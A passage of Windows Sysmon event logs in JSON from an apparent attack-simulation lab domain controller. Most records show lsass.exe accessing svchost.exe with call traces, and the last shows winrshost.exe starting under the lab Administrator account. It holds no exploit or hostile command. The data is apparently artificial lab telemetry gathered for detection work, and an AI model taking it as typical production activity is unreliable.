0x1000\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\lsasrv.dll+11c6e|C:\\Windows\\system32\\lsasrv.dll+1e0a8|C:\\Windows\\system32\\lsasrv.dll+1d2d1|C:\\Windows\\system32\\lsasrv.dll+1bb00|C:\\Windows\\system32\\lsasrv.dll+2810b|C:\\Windows\\SYSTEM32\\SspiSrv.dll+1467|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:52:35.390","SourceProcessGUID":"{A837DB8D-01B3-5F25-0000-001001540000}","SourceProcessId":"864","SourceThreadId":"4072","SourceImage":"C:\\Windows\\system32\\lsass.exe","TargetProcessGUID":"{A837DB8D-01B5-5F25-0000-0010FACE0000}","TargetProcessId":"1332","TargetImage":"C:\\Windows\\system32\\svchost.exe","GrantedAccess":"0x1000","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\lsasrv.dll+11c6e|C:\\Windows\\system32\\lsasrv.dll+1e0a8|C:\\Windows\\system32\\lsasrv.dll+1d2d1|C:\\Windows\\system32\\lsasrv.dll+1bb00|C:\\Windows\\system32\\lsasrv.dll+2810b|C:\\Windows\\SYSTEM32\\SspiSrv.dll+1467|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:52:35","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:52:35","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":4771,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:52:35.406\r\nSourceProcessGUID: {A837DB8D-01B3-5F25-0000-001001540000}\r\nSourceProcessId: 864\r\nSourceThreadId: 4072\r\nSourceImage: C:\\Windows\\system32\\lsass.exe\r\nTargetProcessGUID: {A837DB8D-01B5-5F25-0000-0010FACE0000}\r\nTargetProcessId: 1332\r\nTargetImage: C:\\Windows\\system32\\svchost.exe\r\nGrantedAccess: 0x1000\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\lsasrv.dll+1b05d|C:\\Windows\\system32\\lsasrv.dll+2810b|C:\\Windows\\SYSTEM32\\SspiSrv.dll+1467|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:52:35.406","SourceProcessGUID":"{A837DB8D-01B3-5F25-0000-001001540000}","SourceProcessId":"864","SourceThreadId":"4072","SourceImage":"C:\\Windows\\system32\\lsass.exe","TargetProcessGUID":"{A837DB8D-01B5-5F25-0000-0010FACE0000}","TargetProcessId":"1332","TargetImage":"C:\\Windows\\system32\\svchost.exe","GrantedAccess":"0x1000","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\lsasrv.dll+1b05d|C:\\Windows\\system32\\lsasrv.dll+2810b|C:\\Windows\\SYSTEM32\\SspiSrv.dll+1467|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:52:35","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:52:35","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":4772,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:52:35.421\r\nSourceProcessGUID: {A837DB8D-01B3-5F25-0000-001001540000}\r\nSourceProcessId: 864\r\nSourceThreadId: 4072\r\nSourceImage: C:\\Windows\\system32\\lsass.exe\r\nTargetProcessGUID: {A837DB8D-01B5-5F25-0000-0010FACE0000}\r\nTargetProcessId: 1332\r\nTargetImage: C:\\Windows\\system32\\svchost.exe\r\nGrantedAccess: 0x1000\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\lsasrv.dll+11c6e|C:\\Windows\\system32\\lsasrv.dll+1a4e6|C:\\Windows\\system32\\lsasrv.dll+1ba8f|C:\\Windows\\system32\\lsasrv.dll+2810b|C:\\Windows\\SYSTEM32\\SspiSrv.dll+1467|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:52:35.421","SourceProcessGUID":"{A837DB8D-01B3-5F25-0000-001001540000}","SourceProcessId":"864","SourceThreadId":"4072","SourceImage":"C:\\Windows\\system32\\lsass.exe","TargetProcessGUID":"{A837DB8D-01B5-5F25-0000-0010FACE0000}","TargetProcessId":"1332","TargetImage":"C:\\Windows\\system32\\svchost.exe","GrantedAccess":"0x1000","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\lsasrv.dll+11c6e|C:\\Windows\\system32\\lsasrv.dll+1a4e6|C:\\Windows\\system32\\lsasrv.dll+1ba8f|C:\\Windows\\system32\\lsasrv.dll+2810b|C:\\Windows\\SYSTEM32\\SspiSrv.dll+1467|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:52:35","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:52:35","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":4773,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:52:35.421\r\nSourceProcessGUID: {A837DB8D-01B3-5F25-0000-001001540000}\r\nSourceProcessId: 864\r\nSourceThreadId: 4072\r\nSourceImage: C:\\Windows\\system32\\lsass.exe\r\nTargetProcessGUID: {A837DB8D-01B5-5F25-0000-0010FACE0000}\r\nTargetProcessId: 1332\r\nTargetImage: C:\\Windows\\system32\\svchost.exe\r\nGrantedAccess: 0x1000\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\lsasrv.dll+11c6e|C:\\Windows\\system32\\lsasrv.dll+1e0a8|C:\\Windows\\system32\\lsasrv.dll+1d2d1|C:\\Windows\\system32\\lsasrv.dll+1bb00|C:\\Windows\\system32\\lsasrv.dll+2810b|C:\\Windows\\SYSTEM32\\SspiSrv.dll+1467|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:52:35.421","SourceProcessGUID":"{A837DB8D-01B3-5F25-0000-001001540000}","SourceProcessId":"864","SourceThreadId":"4072","SourceImage":"C:\\Windows\\system32\\lsass.exe","TargetProcessGUID":"{A837DB8D-01B5-5F25-0000-0010FACE0000}","TargetProcessId":"1332","TargetImage":"C:\\Windows\\system32\\svchost.exe","GrantedAccess":"0x1000","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\lsasrv.dll+11c6e|C:\\Windows\\system32\\lsasrv.dll+1e0a8|C:\\Windows\\system32\\lsasrv.dll+1d2d1|C:\\Windows\\system32\\lsasrv.dll+1bb00|C:\\Windows\\system32\\lsasrv.dll+2810b|C:\\Windows\\SYSTEM32\\SspiSrv.dll+1467|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:52:35","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:52:35","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":4774,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:52:35.718\r\nSourceProcessGUID: {A837DB8D-01B3-5F25-0000-001001540000}\r\nSourceProcessId: 864\r\nSourceThreadId: 2800\r\nSourceImage: C:\\Windows\\system32\\lsass.exe\r\nTargetProcessGUID: {A837DB8D-01B5-5F25-0000-0010FACE0000}\r\nTargetProcessId: 1332\r\nTargetImage: C:\\Windows\\system32\\svchost.exe\r\nGrantedAccess: 0x1000\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\lsasrv.dll+1b05d|C:\\Windows\\system32\\lsasrv.dll+2810b|C:\\Windows\\SYSTEM32\\SspiSrv.dll+1467|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:52:35.718","SourceProcessGUID":"{A837DB8D-01B3-5F25-0000-001001540000}","SourceProcessId":"864","SourceThreadId":"2800","SourceImage":"C:\\Windows\\system32\\lsass.exe","TargetProcessGUID":"{A837DB8D-01B5-5F25-0000-0010FACE0000}","TargetProcessId":"1332","TargetImage":"C:\\Windows\\system32\\svchost.exe","GrantedAccess":"0x1000","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\lsasrv.dll+1b05d|C:\\Windows\\system32\\lsasrv.dll+2810b|C:\\Windows\\SYSTEM32\\SspiSrv.dll+1467|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:52:35","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:52:35","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":4775,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:52:35.718\r\nSourceProcessGUID: {A837DB8D-01B3-5F25-0000-001001540000}\r\nSourceProcessId: 864\r\nSourceThreadId: 2800\r\nSourceImage: C:\\Windows\\system32\\lsass.exe\r\nTargetProcessGUID: {A837DB8D-01B5-5F25-0000-0010FACE0000}\r\nTargetProcessId: 1332\r\nTargetImage: C:\\Windows\\system32\\svchost.exe\r\nGrantedAccess: 0x1000\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\lsasrv.dll+11c6e|C:\\Windows\\system32\\lsasrv.dll+1a4e6|C:\\Windows\\system32\\lsasrv.dll+1ba8f|C:\\Windows\\system32\\lsasrv.dll+2810b|C:\\Windows\\SYSTEM32\\SspiSrv.dll+1467|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:52:35.718","SourceProcessGUID":"{A837DB8D-01B3-5F25-0000-001001540000}","SourceProcessId":"864","SourceThreadId":"2800","SourceImage":"C:\\Windows\\system32\\lsass.exe","TargetProcessGUID":"{A837DB8D-01B5-5F25-0000-0010FACE0000}","TargetProcessId":"1332","TargetImage":"C:\\Windows\\system32\\svchost.exe","GrantedAccess":"0x1000","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\lsasrv.dll+11c6e|C:\\Windows\\system32\\lsasrv.dll+1a4e6|C:\\Windows\\system32\\lsasrv.dll+1ba8f|C:\\Windows\\system32\\lsasrv.dll+2810b|C:\\Windows\\SYSTEM32\\SspiSrv.dll+1467|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:52:35","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:52:35","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":4776,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:52:35.718\r\nSourceProcessGUID: {A837DB8D-01B3-5F25-0000-001001540000}\r\nSourceProcessId: 864\r\nSourceThreadId: 2800\r\nSourceImage: C:\\Windows\\system32\\lsass.exe\r\nTargetProcessGUID: {A837DB8D-01B5-5F25-0000-0010FACE0000}\r\nTargetProcessId: 1332\r\nTargetImage: C:\\Windows\\system32\\svchost.exe\r\nGrantedAccess: 0x1000\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\lsasrv.dll+11c6e|C:\\Windows\\system32\\lsasrv.dll+1e0a8|C:\\Windows\\system32\\lsasrv.dll+1d2d1|C:\\Windows\\system32\\lsasrv.dll+1bb00|C:\\Windows\\system32\\lsasrv.dll+2810b|C:\\Windows\\SYSTEM32\\SspiSrv.dll+1467|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:52:35.718","SourceProcessGUID":"{A837DB8D-01B3-5F25-0000-001001540000}","SourceProcessId":"864","SourceThreadId":"2800","SourceImage":"C:\\Windows\\system32\\lsass.exe","TargetProcessGUID":"{A837DB8D-01B5-5F25-0000-0010FACE0000}","TargetProcessId":"1332","TargetImage":"C:\\Windows\\system32\\svchost.exe","GrantedAccess":"0x1000","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\lsasrv.dll+11c6e|C:\\Windows\\system32\\lsasrv.dll+1e0a8|C:\\Windows\\system32\\lsasrv.dll+1d2d1|C:\\Windows\\system32\\lsasrv.dll+1bb00|C:\\Windows\\system32\\lsasrv.dll+2810b|C:\\Windows\\SYSTEM32\\SspiSrv.dll+1467|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:52:35","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:52:35","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":1,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":5,"Task":1,"OpcodeValue":0,"RecordNumber":4777,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process Create:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:52:35.723\r\nProcessGuid: {A837DB8D-0323-5F25-0000-0010D2950700}\r\nProcessId: 672\r\nImage: C:\\Windows\\System32\\winrshost.exe\r\nFileVersion: 10.0.14393.0 (rs1_release.160715-1616)\r\nDescription: Host Process for WinRM's Remote Shell plugin\r\nProduct: Microsoft® Windows® Operating System\r\nCompany: Microsoft Corporation\r\nOriginalFileName: winrshost.exe\r\nCommandLine: C:\\Windows\\system32\\WinrsHost.exe -Embedding\r\nCurrentDirectory: C:\\Windows\\system32\\\r\nUser: ATTACKRANGE\\Administrator\r\nLogonGuid: {A837DB8D-0323-5F25-0000-0020A2950700}\r\nLogonId: 0x795A2\r\nTerminalSessionId: 0\r\nIntegrityLevel: High\r\nHashes: MD5=F40EC96CA18D88CB1F26FA2070010714,SHA256=607C014A3CA531FFAD50BCD90095C01E4E6B691D9E18473C70E4699CF1E31453,IMPHASH=4216D8E7F36901B61DFD6309B49BCF96\r\nParentProcessGuid: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nParentProcessId: 612\r\nParentImage: C:\\Windows\\System32\\svchost.exe\r\nParentCommandLine: C:\\Windows\\system32\\svchost.exe -k DcomLaunch","Category":"Process Create (rule: ProcessCreate)","Opcode":"Info","UtcTime":"2020-08-01 05:52:35.723","ProcessGuid":"{A837DB8D-0323-5F25-0000-0010D2950700}","Image":"C:\\Windows\\System32\\winrshost.exe","FileVersion":"10.0.14393.0 (rs1_release.160715-1616)","Description":"Host Process for WinRM's Remote Shell plugin","Product":"Microsoft® Windows® Operating System","Company":"Microsoft Corporation","OriginalFileName":"winrshost.exe","CommandLine":"C:\\Windows\\system32\\WinrsHost.exe -Embedding","CurrentDirectory":"C:\\Windows\\system32\\","User":"ATTACKRANGE\\Administrator","LogonGuid":"{A837DB8D-0323-5F25-0000-0020A2950700}","LogonId":"0x795a2","TerminalSessionId":"0","IntegrityLevel":"High","Hashes":"MD5=F40EC96CA18D88CB1F26FA2070010714,SHA256=607C014A3CA531FFAD50BCD90095C01E4E6B691D9E18473C70E4699CF1E31453,IMPHASH=4216D8E7F36901B61DFD6309B49BCF96","ParentProcessGuid":"{A837DB8D-01B5-5F25-0000-0010B4650000}","ParentProcessId":"612","ParentImage":"C:\\Windows\\System32\\svchost.exe","ParentCommandLine":"C:\\Windows\\system32\\svchost.exe -k DcomLaunch","EventReceivedTime":"2020-08-01 